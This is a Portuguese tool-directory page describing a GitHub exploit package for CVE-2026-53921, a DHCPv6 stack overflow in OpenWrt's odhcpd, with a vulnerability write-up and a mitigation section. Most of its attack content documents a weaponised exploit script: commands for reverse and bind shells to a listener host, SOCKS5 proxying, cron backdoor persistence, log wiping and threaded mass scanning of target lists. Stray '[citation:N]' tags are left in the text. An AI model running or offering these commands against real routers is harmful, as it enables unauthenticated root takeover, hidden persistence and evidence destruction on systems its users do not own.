Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – Estouro de Pilha (Stack Overflow) do odhcpd (CVSS 9.8) 🛡️ Write-Up detalhado e abrangente da vulnerabilidade, Verificador e Multi-exploit para RCE via DHCPv6 no OpenWrt. Overflow de vetor duplo (IA_NA/IA_PD) com shellcode MIPS/ARM, cadeias ROP, proxy SOCKS5, persistência, limpeza de logs e varredura em massa. Use com Ética, Permaneça Dentro da Lei. 🔒 | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
Segurança de Sistemas EmbarcadosReconhecimentoFrameworks de ExploraçãoSegurança IoTAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoRed TeamingGeração de Shellcode

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-53921 – Estouro de Pilha (Stack Overflow) do odhcpd (CVSS 9.8) 🛡️ Write-Up detalhado e abrangente da vulnerabilidade, Verificador e Multi-exploit para RCE via DHCPv6 no OpenWrt. Overflow de vetor duplo (IA_NA/IA_PD) com shellcode MIPS/ARM, cadeias ROP, proxy SOCKS5, persistência, limpeza de logs e varredura em massa. Use com Ética, Permaneça Dentro da Lei. 🔒

Desenvolvimento de Payloads
Exploração de Binários
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

Ver Repositório
68há 1 mêsAinda não revisado
Compartilhar

CVE-2026-53921

CVE-2026-53921 – Estouro de Pilha no odhcpd

CVE CVSS OpenWrt

⚠️ Apenas para fins educacionais e testes autorizados. O uso não autorizado é ilegal.


📖 Visão Geral da Vulnerabilidade

CVE-2026-53921 é um estouro de buffer de pilha crítico no daemon odhcpd do OpenWrt – o servidor DHCPv6/DHCPv4/RA padrão.

🔍 Como funciona

A vulnerabilidade existe no código de manipulação de mensagens DHCPv6 do odhcpd, especificamente nas funções build_ia() e dhcpv6_ia_handle_IAs().

Análise Técnica Aprofundada

1. A Causa Raiz

O bug ocorre durante a serialização (empacotamento) de pacotes de Resposta DHCPv6. Quando o odhcpd responde a solicitações de clientes, ele constrói a resposta em um buffer de pilha de tamanho fixo de 512 bytes sem a devida verificação de limites.

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. Acionando o Estouro

Um atacante envia um DHCPv6 Request (ou Solicit) com:

  • 5 ou mais opções IA_NA (Identity Association for Non-temporary Address), cada uma contendo uma sub-opção IAAddress.
  • 22 ou mais opções IA_PD (Identity Association for Prefix Delegation).

Cada opção consome espaço na pilha enquanto o odhcpd constrói sua Resposta. Os dados acumulados excedem 512 bytes, causando o estouro.

3. Dois Vetores de Estouro


Vector Trigger Overflow Point


Site 1 5 opções IA_NA build_ia() para IA_NA com endereços IPv6

Site 2 22 opções IA_PD build_ia() para IA_PD

A causa raiz é idêntica, mas o estouro ocorre em caminhos de código diferentes, tornando ambos os vetores igualmente exploráveis.

4. Layout da Memória

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

O atacante sobrescreve o endereço de retorno salvo para apontar para o seu shellcode na memória.

5. Requisitos de Exploração


Requisito Descrição


Acesso à Rede O atacante deve ter conectividade IPv6 com o alvo

Autenticação Nenhuma -- ataque não autenticado

Privilégios odhcpd executa como root, então o RCE concede controle total do sistema

Serviço Alvo A porta UDP 547 (DHCPv6) deve estar aberta

6. Posicionamento do Shellcode

Em um exploit real, o shellcode do atacante é colocado nos campos de endereço IPv6 do IAAddress (16 bytes por IA_NA). Os pacotes forjados empacotam o shellcode, o NOP sled e o endereço de retorno nesses campos.

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. Cadeia de Impacto

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. Vetores de Ataque vs. Status de Mitigação

Versão Status RCE Possível?


odhcpd < e432dd6 Vulnerável ✅ Sim OpenWrt < 24.10.8 Vulnerável ✅ Sim OpenWrt < 25.12.5 Vulnerável ✅ Sim OpenWrt 24.10.8+ Corrigido ❌ Não OpenWrt 25.12.5+ Corrigido ❌ Não odhcpd master + e432dd6 Corrigido ❌ Não

9. Exploração no Mundo Real

Esta vulnerabilidade é particularmente perigosa porque:

  • O odhcpd está habilitado por padrão nas instalações do OpenWrt.
  • Nenhuma autenticação é necessária---qualquer dispositivo no mesmo segmento IPv6 pode atacar.
  • O bug está no caminho de processamento de solicitações.
  • Stack canaries e ASLR raramente estão presentes em dispositivos MIPS/ARM embarcados.
  • O exploit pode contornar defesas comuns em muitos ambientes embarcados.

🎯 Versões Afetadas

ComponenteVersões vulneráveisCorrigido em
odhcpd (branch master)antes do commit e432dd6e432dd6 ou posterior
Lançamentos do OpenWrt

🧰 Ferramentas

Este repositório fornece dois scripts independentes:

ScriptObjetivoCódigo de exploitSegurança
verifier.pyVerificação de vulnerabilidade não intrusiva❌ Não✅ Seguro
exploit.py

🔎 verifier.py – Verificador de Vulnerabilidade

  • Envia um Solicit DHCPv6 padrão para verificar se o serviço está ativo.
  • Lê banners HTTP/SSH para detectar a versão do OpenWrt.
  • Compara a versão com a faixa vulnerável conhecida.
  • Não envia nenhum payload de estouro ou shellcode.

💥 exploit.py – Exploit Completo

  • Vetores de estouro duplos: IA_NA (Site1) e IA_PD (Site2).
  • Detecção automática de arquitetura (MIPS / ARM).
  • Shellcode reverse e bind para MIPS big-endian.
  • Suporte a proxy SOCKS5.
  • Persistência (backdoor via cron) e limpeza de logs.
  • Varredura com threads e exploração em massa.
  • Codificação opcional de payload (XOR).

🚀 Instalação

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 Uso

🔍 Verificador – verifica se um alvo é vulnerável

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 Exploit – obter uma reverse shell (não use para atividades ilegais, apenas teste avançado)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ Opções de Linha de Comando

verifier.py

ArgumentoDescrição
-u, --targetEndereço IPv6 do alvo (obrigatório)
-i, --ifaceInterface de rede (padrão: eth0)

exploit.py

🧪 Exemplos de Cenários

1. Escanear uma lista de alvos

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ Mitigação

Atualize o OpenWrt para 24.10.8 ou 25.12.5 ou posterior.

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 Referências

Fontes Oficiais

  • Advisory de Segurança do OpenWrt (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 Advisory detalhado cobrindo ambos os vetores de estouro no odhcpd.

  • Entrada do CVE-2026-53921 no NVD https://nvd.nist.gov/vuln/detail/CVE-2026-53921 Entrada oficial do banco de dados de vulnerabilidades do NIST.

  • Notas de Lançamento do OpenWrt 24.10.8 https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 Anúncio oficial de lançamento do branch 24.10.

  • Notas de Lançamento do OpenWrt 25.12.5 https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html Anúncio oficial de lançamento do branch 25.12.

CVEs Relacionadas Corrigidas na Mesma Versão

As versões 24.10.8 e 25.12.5 abordam múltiplas vulnerabilidades do odhcpd além do CVE-2026-53921 [citation:9]:

Análises Técnicas e Artigos

  • Análise do The Hacker News https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html Detalhamento técnico completo da vulnerabilidade e dos vetores de exploração. [citation:1]

  • Repositório de PoC no GitHub https://github.com/0xBlackash/CVE-2026-53921 Implementações públicas de proof-of-concept e detalhes técnicos. [citation:3]

Correções de Segurança Adicionais no 25.12.5

A versão 25.12.5 também aborda vulnerabilidades em outros componentes principais [citation:10]:

  • uhttpd: Smuggling de requisições HTTP (CVE-2026-55612, CVE-2026-55614)
  • LuCI: Múltiplas falhas de escalonamento de privilégios e XSS
  • cgi-io: Path traversal autenticado
  • Linux Kernel: Atualizado para 6.12.94 com múltiplos CVEs
  • OpenSSL: Atualizado para 3.5.7 resolvendo diversos CVEs
  • Dropbear SSH: Corrigidos CVE-2019-6111 e CVE-2026-35385

Documentação de Apoio

  • Seletor de Firmware do OpenWrt https://firmware-selector.openwrt.org/ Baixe imagens de firmware corrigidas para o seu dispositivo.

  • Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA https://www.cisa.gov/known-exploited-vulnerabilities-catalog Verifique se o CVE-2026-53921 foi adicionado ao KEV (até 27 de julho de 2026, não listado). [citation:1]

Baixar ferramenta
< 24.10.8
< 25.12.5
24.10.8 & 25.12.5
Exploit completo armado
✅ Sim
⚠️ Perigoso
ArgumentoDescrição
-u, --targetEndereço IPv6 do alvo
-l, --listArquivo com lista de alvos
-i, --ifaceInterface de rede (padrão: eth0)
--lhostIP do ouvinte (obrigatório)
--lportPorta do ouvinte (padrão: 4444)
--vectorsite1, site2 ou both (padrão: both)
--offsetOffset da pilha (padrão: 512)
--retEndereço de retorno em hex (ex.: 0x7ffff000)
--archForçar mips ou arm (detecção automática se omitido)
--payloadreverse ou bind (padrão: reverse)
--encodenone ou xor (padrão: none)
--proxy-hostIP do proxy SOCKS5
--proxy-portPorta do proxy SOCKS5 (padrão: 1080)
--persistenceInstalar backdoor via cron
--clear-logsLimpar syslog após a exploração
--scan-onlyApenas escanear alvos, não explorar
--threadsNúmero de threads para varredura (padrão: 5)
--verboseRegistro detalhado (verbose)
ID do CVESeveridadeDescrição
CVE-2026-53918AltaUse-after-free no manipulador de IA DHCPv6 [citation:4][citation:9]
CVE-2026-53920AltaDivulgação de memória da pilha via opção IA_NA/IA_PD DHCPv6 truncada [citation:9]
CVE-2026-53922ModeradaNegação de serviço pré-autenticação via underflow de size_t [citation:9]
CVE-2026-55606ModeradaLeitura além do limite do buffer de pilha devido a incompatibilidade de endianness no comprimento do DUID [citation:9]
CVE-2026-62948-Injeção de hostname DHCPv6 levando a XSS armazenado [citation:1]
CVE-2026-62947-Path traversal autenticado no cgi-io [citation:1]